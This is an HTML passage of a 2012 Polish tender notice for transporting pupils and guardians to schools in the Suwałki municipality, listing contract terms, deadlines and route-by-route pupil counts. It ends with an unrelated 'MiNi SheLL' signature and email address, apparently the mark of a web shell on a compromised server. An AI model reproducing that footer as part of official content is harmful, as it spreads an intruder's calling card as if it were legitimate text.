5.	W przypadku dowożenia mniejszej ilości uczniów niż wynika to z zawartej umowy, Zamawiający będzie ponosił wydatki wg faktycznie wykonanego zamówienia na podstawie wystawionych faktur, których weryfikacja nastąpi w oparciu o listy dowożonych uczniów.

6.	Zakazuje się istotnych zmian postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy, chyba że Zamawiający przewidział możliwość dokonania takiej zmiany w ogłoszeniu o zamówieniu lub w specyfikacji. 

7.	Zmiana umowy dokonana z naruszeniem ust. 6 podlega unieważnieniu.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.gmina.suwalki.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Gminny Zespół Ekonomiczno-Administracyjny Szkół w Suwałkach
ul. Kościuszki 71, 16-400 Suwałki.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 20.08.2012 godzina 08:00, miejsce: Gminny Zespół Ekonomiczno-Administracyjny Szkół w Suwałkach
ul. Kościuszki 71, 16-400 Suwałki.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> ZADANIE NR 1.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest dowiezienie i odwiezienie uczniów i ich opiekunów zamieszkałych na terenie gminy Suwałki do publicznych przedszkoli, oddziałów przedszkolnych lub innej formy wychowania przedszkolnego, szkół podstawowych
i gimnazjów poprzez sukcesywną dostawę-sprzedaż biletów miesięcznych w okresie
od 20 sierpnia 2012 r. do 5 grudnia 2012 r. wraz z zapewnieniem opieki podczas przewozu, zgodnie z warunkami zawartymi we wzorze umowy - stanowiącej załącznik nr 5 do SIWZ.

 
Zadanie obejmuje dowóz (D) i odwiezienie (O) uczniów szkół i ich rodziców na następujących trasach:
1.Bakaniuk - Suwałki Dworzec (D)
Suwałki Dworzec - Bakaniuk  (O) 1 uczeń*
2.Biała Woda Pętla - Suwałki Szpitalna (D)
Suwałki Szpitalna - Biała Woda Pętla(O) 1 uczniów*
3.Biała Woda Lasek  - Suwałki Dworzec (D)
Suwałki Dworzec - Biała Woda Lasek  (O) 2 uczniów*
4.Biała Woda Lasek - Suwałki Reja (D)
Suwałki Reja - Biała Woda Lasek (O) 2 uczniów*
5.Biała Woda Lasek - Suwałki Szpitalna (D)
Suwałki Szpitalna - Biała Woda Lasek (O) 1 uczeń*
6.Biała Woda Lasek - Suwałki Hamerszmita (O)
Suwałki Hamerszmita - Biała Woda Lasek (D) 1 uczeń*
7.Biała Woda I - Suwałki Dworzec (O)
Suwałki Dworzec - Biała Woda I (D) 4 uczniów* i 1 opiekun*
8.Biała Woda I - Suwałki Reja (O)
Suwałki Reja - Biała Woda I (D) 1 uczeń*
9.Biała Woda I - Suwałki Hamerszmita (O)
Suwałki Hamerszmita - Biała Woda I (D) 1 uczeń*
10.Biała Woda I - Suwałki Szpitalna(O)
 Suwałki Szpitalna - Biała Woda I (D) 1 uczeń*
11. Biała Woda II - Suwałki Dworzec (O)
Suwałki Dworzec - Biała Woda II (D) 1 uczeń *
12.Biała Woda II - Suwałki Hamerszmita (O)
Suwałki Hamerszmita - Biała Woda II (D) 3 uczniów* i 1 opiekun*
13.Biała Woda II - Suwałki Szpitalna (O)
Suwałki Szpitalna - Biała Woda II (D) 2 uczniów*
14.Biała Woda II - Suwałki Reja (O)
Suwałki Reja - Biała Woda II (D) 1 uczeń*
15.Biała Woda III - Suwałki Dworzec (O)
Suwałki Dworzec - Biała Woda III (D) 1 uczeń*
16.Biała Woda III - Suwałki Szpitalna (O)
Suwałki Szpitalna - Biała Woda III (D) 1 uczeń*
17.Biała Woda III - Suwałki Hamerszmita (O)
Suwałki Hamerszmita - Biała Woda III (D) 1 uczeń*
18.Biała Woda III - Suwałki Reja (O)
Suwałki Reja - Biała Woda III (D) 1 uczeń*
19.Bród Stary - Suwałki Szpitalna (O)
Suwałki Szpitalna - Bród Stary (D) 13 uczniów*
20.Burdeniszki - Stary Folwark (O)
Stary Folwark - Burdeniszki (D) 17 uczniów* 1 uczeń niepełnosprawny* 1 opiekun*
21.Czarnakowizna - Suwałki Dworzec (O)
Suwałki Dworzec - Czarnakowizna (D) 3 uczniów*
22.Czarnakowizna - Suwałki Mickiewicza (O)
Suwałki Mickiewicza - Czarnakowizna (D) 3 uczniów*
23.Czerwony Folwark - Stary Folwark (O)
Stary Folwark - Czerwony Folwark (D) 3 uczniów*
24.Korkliny - Suwałki Dworzec (O)
Suwałki Dworzec - Kuków Folwark (D) 4 uczniów*
25.Korkliny - Suwałki Mickiewicza (O)
Suwałki Mickiewicza - Korkliny (D) 2 uczniów*
26.Korkliny 1 - Suwałki Mickiewicza (O)
Suwałki Mickiewicza - Korkliny 1 (D) 2 uczniów*
27.Korobiec - Suwałki Dworzec (O)
Suwałki Dworzec - Korobiec (D) 1 uczeń*
28.Korobiec - Suwałki Mickiewicza (O)
Suwałki Mickiewicza - Korobiec (D) 6 uczniów*
29.Korobiec 1 - Suwałki Dworzec (O)
Suwałki Dworzec - Korobiec 1 (D) 1 uczeń*
30.Korobiec 1 - Suwałki Mickiewicza (O)
Suwałki Mickiewicza - Korobiec 1 (D) 2 uczniów*
31.Kuków-Folwark - Suwałki Dworzec (O)
Suwałki Dworzec - Kuków-Folwark (D) 4 uczniów*
32.Kuków-Folwark - Suwałki Mickiewicza (O)
Suwałki Mickiewicza - Kuków-Folwark (D) 12 uczniów* i 5 opiekunów*
33.Lipniak - Kaletnik (O)
Kaletnik - Lipniak (D) 2 uczniów*
34.Mały Bród - Suwałki Dworzec (O)
Suwałki Dworzec - Mały Bród (D) 1 uczeń* i 1 opiekun*
35.Mały Bród - Suwałki Mickiewicza (O)
Suwałki Mickiewicza - Mały Bród (D) 2 uczniów* i 1 opiekun*
36.Osowa - Suwałki Dworzec (O)
Suwałki Dworzec - Osowa (D) 3 uczniów*
37.Osowa - Suwałki Mickiewicza (O)
Suwałki Mickiewicza - Osowa (D) 2 uczniów*
38.Potasznia - Suwałki Dworzec (O)
Suwałki Dworzec - Potasznia (D) 1 uczeń*
39.Płociczno PKP - Płociczno-Tartak (O)
Płociczno-Tartak - Płociczno PKP (D) 1 uczeń*
40.Potasznia - Suwałki Hamerszmita (O)
Suwałki Hamerszmita - Potasznia (D) 3 uczniów* i 2 opiekunów*
41.Potasznia - Suwałki Szpitalna (O)
Suwałki Szpitalna - Potasznia (D) 27 uczniów* i 1 opiekun*
42.Potasznia Kolonie - Suwałki Dworzec (O)
Suwałki Dworzec - Potasznia Kolonie (D) 1 uczeń*
43.Taciewo - Suwałki Dworzec (O)
Suwałki Dworzec - Taciewo (D) 1 uczeń*
44.Taciewo - Suwałki Mickiewicza (O)
Suwałki Mickiewicza - Taciewo (D) 5 uczniów* i 1 opiekun*
45.Taciewo SK - Suwałki Dworzec (O)
Suwałki Dworzec - Taciewo SK (D) 1 uczeń*
46.Taciewo SK - Suwałki Mickiewicza (O)
Suwałki Mickiewicza - Taciewo SK (D) 2 uczniów*
47.Turówka - Suwałki Dworzec (O)
Suwałki Dworzec - Turówka (D) 2 uczniów*
48.Turówka - Suwałki Mickiewicza (O)
Suwałki Mickiewicza - Turówka (D) 9 uczniów* i 1 opiekun*
49.Turówka Stara - Suwałki Dworzec (O)
Suwałki Dworzec - Turówka Stara (D) 2 uczniów*
50.Turówka Stara - Suwałki Mickiewicza (O)
Suwałki Mickiewicza - Turówka Stara (D) 3 uczniów* i 1 opiekun*
51.Wiatrołuża Pierwsza - Kaletnik (O)
Kaletnik - Wiatrołuża Pierwsza (D) 4 uczniów*
52.Zielone Kamedulskie Osiedle - Przebród Szkoła (O)
Przebród Szkoła - Zielone Kamedulskie Osiedle (D) 28 uczniów*

*orientacyjna liczba uczniów i opiekunów podana na podstawie największej liczby dowożonych na poszczególnych trasach w okresie od 01.06.2011 r. do 31.05.2012 roku. Podkreślone ilości dojeżdżających na poszczególnych trasach oznaczają przewidywane ilości wynikające z wykazów uczniów na rok szkolny 2012/2013. Liczba uczniów i opiekunów na poszczególnych trasach może ulec zmianie i zostanie zaktualizowana przy pierwszym zamówieniu na rok szkolny 2012/2013 na podstawie wykazów otrzymanych ze szkół.
SK oznacza skrzyżowanie.
Zamawiający przed rozpoczęciem wykonywania zadań (w danym miesiącu) dostarczy Wykonawcy imienną listę uczniów i ich opiekunów, godziny odjazdów i wyjazdów wraz 
z wykazem tras, na które Wykonawca dostarczy bilety miesięczne. 
W okresach zimowych pojazdy dowożące dzieci muszą być ogrzewane.
W przypadku awarii wyznaczonego autobusu Wykonawca zapewni pojazd zastępczy spełniający właściwe wymagania techniczne w ruchu drogowym.
Pod pojęciem opieka rozumie się zapewnienie warunków bezpieczeństwa i higieny 
w trakcie wsiadania, wysiadania i przejazdu uczniów, która jest niezbędna przy tego rodzaju przewozach.
Usługa transportowa świadczona będzie przez Wykonawcę w dni powszednie
z wyjątkiem sobót, świąt i innych dni ustawowo wolnych od pracy, a także przerw
w realizacji zajęć dydaktyczno-wychowawczych, określonych w rozporządzeniu Ministra Edukacji Narodowej i Sportu z dnia 18 kwietnia 2002 r. w sprawie organizacji roku szkolnego (Dz.U. Nr 46, poz. 432 ze zm.)..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 60.11.20.00-6.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> ZADANIE NR 2.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest dowiezienie i odwiezienie uczniów i ich opiekunów zamieszkałych na terenie gminy Suwałki do publicznych przedszkoli, oddziałów przedszkolnych lub innej formy wychowania przedszkolnego, szkół podstawowych
i gimnazjów poprzez sukcesywną dostawę-sprzedaż biletów miesięcznych w okresie
od 20 sierpnia 2012 r. do 5 grudnia 2012 r. wraz z zapewnieniem opieki podczas przewozu, zgodnie z warunkami zawartymi we wzorze umowy - stanowiącej załącznik nr 6 do SIWZ. 
Zadanie obejmuje dowóz (D) i odwiezienie (O) uczniów szkół i ich rodziców na następujących trasach:

1.	Buczka  - Suwałki (D)
Suwałki - Buczka (O)  1 uczeń*
2.	Jasionowo - Suwałki (D)
Suwałki - Jasionowo (O) 22 uczniów* i 1 opiekun*
3.	Krzywe - Suwałki (D)
Suwałki - Krzywe (O) 60 uczniów* i 4 opiekunów*
4.	Lipniak - Nowa Wieś (D)
Nowa Wieś - Lipniak (O) 3 uczniów*
5.	Lipniak - Suwałki (D)
Suwałki - Lipniak (O) 7 uczniów*
6.	Mała Huta - Suwałki (D)
Suwałki - Mała Huta (O) 29 uczniów* i 2 opiekunów*
7.	Nowa Wieś - Suwałki (D)
Suwałki - Nowa Wieś (O) 23 uczniów*
8.	Okuniowiec - Nowa Wieś (D)
Nowa Wieś - Okuniowiec (O) 5 uczniów*
9.	Okuniowiec - Suwałki (D)
Suwałki - Okuniowiec(O) 22 uczniów*
10.	Płociczno-Osiedle - Suwałki (D)
Suwałki - Płociczno-Osiedle (O) 3 uczniów*
11.	Płociczno-Tartak - Suwałki (D)
Suwałki - Płociczno-Tartak (O) 2 uczniów* 
12.	Poddubówek - Suwałki (D)
Suwałki - Poddubówek (O) 16 uczniów*
13.	Przebród - Suwałki (D)
Suwałki - Przebród (O) 2 uczniów*
14.	Sobolewo - Płociczno-Tartak (D)
Płociczno-Tartak - Sobolewo (O) 32 uczniów* i 1 opiekun*
15.	Wychodne - Suwałki (D)
Suwałki - Wychodne (O) 1 uczeń*
16.	Zielone Królewskie - Suwałki (D)
Suwałki - Zielone Królewskie (O) 4 uczniów*
17.	Zielone Kamedulskie - Suwałki (D)
Suwałki - Zielone Kamedulskie (O) 1 uczeń* i 1 opiekun*

* orientacyjna liczba uczniów i opiekunów podana na podstawie największej liczby dowożonych na poszczególnych trasach w okresie od 01.06.2011 r. do 31.05.2012 roku. Podkreślone ilości dojeżdżających na poszczególnych trasach oznaczają przewidywane ilości wynikające z wykazów uczniów na rok szkolny 2012/2013. Liczba uczniów i opiekunów na poszczególnych trasach może ulec zmianie i zostanie zaktualizowana przy pierwszym zamówieniu na rok szkolny 2012/2013 na podstawie wykazów otrzymanych ze szkół.
Zamawiający przed rozpoczęciem wykonywania zadań (w danym miesiącu) dostarczy Wykonawcy imienną listę uczniów i ich opiekunów, godziny odjazdów i wyjazdów wraz 
z wykazem tras, na które Wykonawca dostarczy bilety miesięczne. 
W okresach zimowych pojazdy dowożące dzieci muszą być ogrzewane.
W przypadku awarii wyznaczonego autobusu Wykonawca zapewni pojazd zastępczy spełniający właściwe wymagania techniczne w ruchu drogowym.
Pod pojęciem opieka rozumie się zapewnienie warunków bezpieczeństwa i higieny 
w trakcie wsiadania, wysiadania i przejazdu uczniów, która jest niezbędna przy tego rodzaju przewozach.
Usługa transportowa świadczona będzie przez Wykonawcę w dni powszednie
z wyjątkiem sobót, świąt i innych dni ustawowo wolnych od pracy, a także przerw
w realizacji zajęć dydaktyczno-wychowawczych, określonych w rozporządzeniu Ministra Edukacji Narodowej i Sportu z dnia 18 kwietnia 2002 r. w sprawie organizacji roku szkolnego (Dz.U. Nr 46, poz. 432 ze zm.)..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 60.11.20.00-6.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com